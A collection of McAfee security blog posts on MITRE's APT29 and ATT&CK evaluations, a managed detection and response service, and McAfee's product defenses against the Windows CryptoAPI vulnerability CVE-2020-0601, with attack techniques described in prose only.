The post What Are the Main Vectors of Attack in Cybersecurity and How Do They Work? appeared first on Heimdal Security Blog.

MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security

In our recent Racing with Cozy Bear blog, we covered the concept of Time Based Security and highlighted the value protection brings to the defender. This is not to say that blocking an attack removes the threat actor from the equation. Attack-blocking protection slows down the offender, buying the defender valuable time to respond. There are three reasons for this:

  1. Blocking an advance, forces the offender to change their approach and try again
  2. Block-level detections are inherently high fidelity, elevating their priority for defenders
  3. Defenders can focus on other higher priority detected events that have not been blocked

As part of the APT29 evaluation, MITRE did not allow vendors to deploy products in blocking mode as not to interfere with the test. However, they did allow for the deployment of such technologies in non-blocking mode and for participants to highlight scenarios where products would have blocked.

Block-level detections bolstered McAfee’s performance more than any other vendor.

In future evaluations MITRE has stated that protection results will receive their own categories, but during the APT29 evaluation, MITRE captured block-level detections as footnotes as shown in Figure 1.

Figure 1 – Example of Block footnote

From a defender’s perspective, detections that are more definitive are more actionable with increasing value. In keeping with Time Based Security, Host Interrogation has been brought into the following chart; a visual representation of detection types from the evaluation.

Figure 2 – Time-base representation of the value for each detection type

The scope of MITRE’s APR29 evaluation covered 20 major steps across all participating vendors, covering 57 techniques spread across 134 sub-steps. One major step was removed due to emulation challenges, leaving 19 major steps.

The following chart shows plots the highest-ranking detection from each participant. Each step represents the major attacker milestones as emulated, and an opportunity for the defender to protect, detect, and respond.

Figure 3 – Time-Base Security view of best coverage per major step

Another representation of this data is to aggregate these top-detection values for each participant. Here a block modifier is applied to fully represent non-blocking detections as well.

Table 1 – Block Modifier value assignments
Figure 4 – Aggregate Time-Base Security view

Not only did block-level detections bolster McAfee’s performance more than any other vendor, but MVISION Endpoint was the only solution to report such detections on several attack steps.

An example of this in action was captured during:

  • Step 11 – Initial Compromise
    • Technique T1140 (Deobfuscate/Decode Files or Information)
      • Sub-step 11.A.10 (Decoded an embedded DLL payload to disk using certutil.exe)

Living off the land binaries (aka lolbins) are native operating system files that can be (ab)used for more than their original intent. Adversaries are known to use them to bypass security controls since most of these programs are otherwise trusted. Either used in a macro or from the command-line, there are several examples available. A popular choice by groups such as APT28, Turla, Oilrig, and APT10 is the ‘certutil.exe’ tool. Originally intended to query for certificate information or configure Certificate Services, it can also be used to obfuscate/de-obfuscate data (T1140) or remote file copy (T1105) to download files.

At the time of this writing, MITRE has 70 report references for T1140, indeed making it a go-to technique for many offenders. Figures 5 and 6 were captured during the evaluation of this technique.

Figure 5 – JTI rule prevents live off the land attacks using certutil.exe during sub-step 11.A.10
Figure 6 – JTI rule prevents live off the land attacks using certutil.exe during sub-step 11.A.10


While this coverage was provided by MVISION Endpoint, the underlying technology involved is the same in McAfee Endpoint Security 10.7.

Ultimately, coverage is about time. MITRE’s APT29 evaluation in its own way highlighted McAfee’s Time Based Security protection and McAfee’s distinction in block-level detection. Buying time by throwing a speed bump into the path of a speeding Cozy Bear can be the difference in winning the race for security.

*All data is from:


© 2018 – 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post MITRE APT29 Evaluation – Importance of Prevention in Endpoint Security appeared first on McAfee Blogs.

Global Managed Detection and Response: Managing EDR Without the Red Bull

Staying on top of threats 24/7, 365 days a year can overwhelm the best SOC analysts. The need for constant vigilance of cyber threats, not to mention security tasks such as new tool installs, running reports and investigations, followed by reporting to exec levels is becoming unsustainable – just like your supply of energy drinks.

McAfee’s new Global Managed Detection and Response (MDR) service with DXC Technology will provide 24/7 critical alert monitoring, managed threat hunting, advanced investigations, and threat disruption 365 days a year.

An ESG survey reveals the struggles SOCs face to improve security postures with limited talent and resources:

  • 58% of organizations cite employee skills as a key security effectiveness gap
  • 72% say analytics is more difficult than two years ago
  • 70% report having many manual processes as a limiting factor

Global Managed Detection and Response supports McAfee’s “We put the customer first” mantra, freeing SOC analysts from unnecessary operational burdens and empowering security teams to strategically fight adversaries.

McAfee MVISION EDR and endpoint protection products are at the core of this new MDR service. MVISION EDR is an advanced cloud-delivered EDR solution that leverages McAfee’s massive threat intelligence data to provide visibility and advanced threat detection capabilities. In addition to identifying threats, MVISION EDR provides AI-guided investigation that helps analysts make sense of the alerts and guides the investigation process, automating the time-intensive task of collecting and pinpointing key artifacts that are vital to the incident. With the ability to scale to the size of any enterprise, MVISION EDR is the perfect solution to detect and prevent attacks.

DXC Technology is McAfee’s first partner providing threat hunting, advanced investigation and remediation coordination, and will introduce in the future a complete managed service with 24/7 critical alert monitoring.

DXC Technology has a global presence with the support of 3,500-plus security professionals with deep specializations including SOC analytics, forensic investigation, and threat intelligence.

By combining the global security expertise of DXC Technology with our sophisticated automated AI-guided investigations, it allows SOC analysts to focus on resolving the incident and not lose time sifting through noisy alerts. Inspired by the power of working together, McAfee and DXC Technology are enabling your teams to be freed from unnecessary operational burden and empowered to strategically fight adversaries. This high level of outside expertise can enable you to improve both your security posture and keep costs in check.

Whether you’re on the floor at RSA or at the W lobby bar, McAfee’s new Global Managed Detection and Response service with DXC Technology can turn your security conversation from how overwhelmed you are, to how much time you’ll have to disengage as well as how much money you’re going to save on Red Bull.

Learn more here.


The post Global Managed Detection and Response: Managing EDR Without the Red Bull appeared first on McAfee Blogs.

McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. The attacker would use spoofed Elliptic-curve cryptography (ECC) certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts by making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. The Microsoft patch (below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 

Since it was identified, a public exploit POC was posted that will allow any malicious party to use this exploit to sign executables as a third party. Additionally, the bug could intercept and fake secure web (HTTPS) connections and has the power to fake signatures for files and emails.

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations who follow 15/30/60-day patch cycles should consider making an exception and apply the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and how to detect exploitation, and urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) have also released an emergency directive to alert the US private sector and government entities about the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems.  Specifically:

McAfee Endpoint Security (ENS)

McAfee can help protect against this vulnerability with a signature set to help detect fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help to identify file signing abuse prior to patching by providing a workflow to pivot into spoofed CAs and their signed binaries already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures (Emergency Signature set version will prevent file signing abuse by blocking connections that are using certificates known to be impacted by the vulnerability.

 Web Gateway

File inspection for signature have been implemented in Web Gateway Anti-Malware. Using HTTPs scanning on the Web Gateway will move the validity checks for certificates from endpoints to the gateway and provide a central HTTPS certificate policy that is not based on the vulnerable function.


MVISION EDR can detect exploit attempts for this vulnerability on patched systems. In order to identify devices that have been involved recently in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using an NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response has the ability to detect exploit attempts for this vulnerability. To identify devices that have been involved recently in an exploit attempt, the customer can use Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also do a real time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by detecting events routed to SIEM using new signatures available via the normal content update process. (Refer to the knowledge-base article outlining how to update EMS rules.)

New rules have been uploaded to the content server with new signature ID’s and descriptions for these events. Customers can use these to create alarms.

Full details on how to access these solutions are outlined in knowledge-base article KB92322. Additional products may be updated with additional countermeasures and defenses as our research uncovers more. We will continue to update knowledge-base article KB92322 with any additional recommendations or findings.

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

MITRE ATT&CK™, What’s the Big Idea?

MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management. 

                  Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities.  They described the process of taking the larger ATT&CK Matrix and reducing it to a more contextual and manageable set of items they could action; to mitigate the most relevant vectors for their organization.

One great aspect of ATT&CK is that the data is available for all to see.  Leveraging the collective base of reports, we can build a prevalence view of the matrix.  As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

              MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools.  Indeed, this is an important and heavily used technique present in attacks carried out by various actors including APT3 and ATP38, as well as noteworthy malware attacks such as Shamoon and WannaCry, just to name a few.

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to See the activities of an adversary. The first evaluation, or Round 1, was based on an APT3 style attack, and included many of the items on the treemap above.  As you might expect, Remote File Copy was represented.  During the evaluation, MITRE copied a DLL to a remote system (something that the Petya malware does).  While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors that showed a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison).  This designation reserved for the most descriptive of all detection categories.  (See Round 1 Detection Categories).  For more information on McAfee’s Round 1 results, see: MITRE ATT&CK™ APT3 Assessment

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces.  Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.


The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.